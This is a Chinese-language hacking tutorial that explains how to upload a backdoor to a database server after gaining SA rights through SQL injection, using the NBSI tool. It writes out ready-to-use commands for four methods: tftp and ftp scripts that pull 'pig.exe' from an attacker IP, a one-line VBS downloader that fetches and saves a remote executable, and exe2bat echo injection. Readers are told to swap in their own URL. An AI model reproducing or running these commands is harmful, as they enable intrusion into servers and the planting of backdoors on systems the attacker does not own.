上一篇:在Real影片中放木马 >>
当注入碰到SA时的几种上传办法
screen.width-300)this.width=screen.width-300 border=0 alt=click to open in new window>
看见没有?sa权限。。现在我们想把一个后门传上去。然后用nbsi的执行命令那执行一下,如果web服务器和数据库服务器在一块,那上传我们的后门就方便多,找到web路径用nbsi自带的上传一句话木马。然后。。这个应该不用说了。如果只是数据库服器呢?又没开终端。我们可以用在shell中上传的办法。
(1) tftp上传
先在本地用tftp32架一tftp服务器,我已经架设好了,双击, 就开始监听udp 69端口,如图2
screen.width-300)this.width=screen.width-300 border=0 alt=click to open in new window>
然后在nbsi的nbcommander执行tftp -i 218.201.49.92 get pig.exe 注意:pig.exe为我们的后门程序。一执行tftp服务器就有反映了。上传完毕了文件在哪呢?在system32下,当然你也可以自定义路径,命令是:tftp -i 218.201.49.92 get pig.exe c:\pig.exe 下载后保存到c盘,然后我们执行就行了.
(2)ftp上传
这个也够简单的,在nbsi执行命令那块输入
echo open 218.201.49.92 >ftp.txt ‘打开ftp
echo pig >>ftp.txt ‘输入用户名
echo pig >>ftp.txt ‘输入密码
echo get pig.exe >>ftp.txt ‘下载pig.exe 默认是下载到system32目录下
echo bye >>ftp.txt ‘byebye,退出ftp
一行一行的输入而不是一次性全部打上去,写好了之后ftp -s:ftp.txt 等一会后门就会下载到目标机器上了如图3
screen.width-300)this.width=screen.width-300 border=0 alt=click to open in new window>
如果不想下载到system32下面可把第4条语句改一下改为:echo get pig.exe c:\pig.exe >>ftp.txt这样是下载到c盘了,如果遇到echo 执行多次呢,不要紧。反正ftp用户名和密码一样。他执行多次也照样下载。
(3)vbs脚本下载
网上流传的iget.vbs好象用了老是说什么下标界错误?这个我也不明白怎么回事,反正我就是用不了。其实还有另外一个下载脚本是可以用的,为了避免echo 执行多次所以我就采用了只有一行的vbs代码,直接在nbsi执行命令那里输入:
echo set xpost = createobject(^"microsoft.xmlhttp^"):xpost.open ^"get^",^"http://soft.163vv.com/77169/c.exe^",0:xpost.send():set sget = createobject(^"adodb.stream^"):sget.mode = 3:sget.type = 1:sget.open():sget.write(xpost.responsebody):sget.savetofile ^"c:\c.exe^",2 >pig.vbs
本来这段代码是多行的,我把他整合为一行了。意思是下载http://soft.163vv.com/77169/c.exe然后保存到c:\c.exe
要用的朋友只需要把里面的网址改为自己的就行了,好我们在nbsi中执行看看,输入cscript pig.vbs 如图4
screen.width-300)this.width=screen.width-300 border=0 alt=click to open in new window>
呵呵然后用dir c:\看看有没有c.exe这个文件?
(4)exe2bat法
将程序转换为2进制度编码然后用echo命令一行行写入,比较麻烦。而且echo不能执行多次,如果执行多次的话写出来的东西都是错的。方法如下,打开exe2bat,输入文件那里选择要转换的程序,建议不要超过150k,输出文件那里就是保存的位置。然后点转换,就行了,如果出错请多转换几次如图5
screen.width-300)this.width=screen.width-300 border=0 alt=click to open in new window>
好了这时你的c盘下会出现一nc2.bat文件,用记事本打开看看,图6
screen.width-300)this.width=screen.width-300 border=0 alt=click to open in new window>
就是这些,一行一行的在nbsi那里写入吧,把前面的@echo off 和每行开头的@echo去掉就行了。也可以用xiaolu版的nb,有2进制文件上传的功能,大家可以试下.记得,如果用这个上传的话,你得把其他的 echo还有>>等等都去掉只留下2进制编码。图7
screen.width-300)this.width=screen.width-300 border=0 alt=click to open in new window>
具体怎么样我也不清楚,没试过。注入中上传比较有效果的方法都已经介绍完了,好好利用
()
下一篇:Linux安全配置步骤简述 >>
相关文章:
- · 操作系统概览X86平台 四大类约25种操作系统
- · 利用路由器做到防止DoS洪水攻击
- · Win XP操作系统中切换用户的便捷途径
- · 自动给工作站“添加/删除”系统组件
- · 入侵宝典 用SlimFTP将肉鸡改为私人服务器
- · 学习Linux的八点忠告
- · 终端全攻略
- · Unix/Linux系统下轻量级Shell工具
- · 对付ARP Spoofing的一个备用手段
- · 虚拟世界中的追踪技术
- · 解剖分析3721及上网助手
- · 用Vmware安装longhorn系统方案
- · 用TM让个人名片与通讯录无缝结合
- · QQ硬盘使用技巧全攻略
- · 让视频更流畅 RealPlayer10技巧大全
- · UNIX 常用的指令/终结完整编
- · Windows系统自启动程序关联位置
- · freebsd下安装GIMP
- · 文件分配表-教你了解文件分配表的知识
- · 98/2000/XP密码恢复方法
- · WIN 2000简单的入侵常识
- · 内网数据库服务器入侵实战
- · 杜绝自动弹出的网页
- · XP中服务与后门技术
- · 解决大家对PING命令的误解
- · 让系统使用更方便的六招实用秘籍
- · 谈谈针对Linux病毒的起源、发展以及分类
- · 天下无贼 两招解决IP地址盗用问题
- · 基于SSL技术的VPN 远程访问可以更安全
- · 关于“网络钓鱼”的主要手法及防范
- · 微软操作系统和IE中集成RSS 出现安全问题
- · 著名黑客Kevin Mitnick谈网络安全
- · QQ自动发送文件病毒解决方法
- · 用FlashFXP选择性批量下载0day资源
- · 用QQ直播Channel V全攻略
- · Windows 超过4G内存管理
- · 精解系统非法操作原因及解决方法
- · 关于netstat -an的几个小问题